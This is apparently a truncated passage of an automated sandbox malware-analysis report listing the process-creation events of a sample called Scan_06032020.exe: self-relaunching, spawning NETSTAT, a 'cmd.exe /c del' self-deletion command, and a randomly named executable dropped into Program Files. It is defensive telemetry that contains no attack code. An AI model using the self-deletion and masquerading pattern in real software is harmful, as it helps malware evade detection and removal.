          Source: Scan_06032020.exeReversingLabs: Detection: 48%
          Source: unknownProcess created: C:\Users\user\Desktop\Scan_06032020.exe 'C:\Users\user\Desktop\Scan_06032020.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Scan_06032020.exe {path}
          Source: unknownProcess created: C:\Users\user\Desktop\Scan_06032020.exe {path}
          Source: unknownProcess created: C:\Users\user\Desktop\Scan_06032020.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scan_06032020.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe
          Source: unknownProcess created: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Users\user\Desktop\Scan_06032020.exeProcess created: C:\Users\user\Desktop\Scan_06032020.exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\Scan_06032020.exeProcess created: C:\Users\user\Desktop\Scan_06032020.exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\Scan_06032020.exeProcess created: C:\Users\user\Desktop\Scan_06032020.exe {path}Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe C:\Program Files (x86)\Qor0xv4i\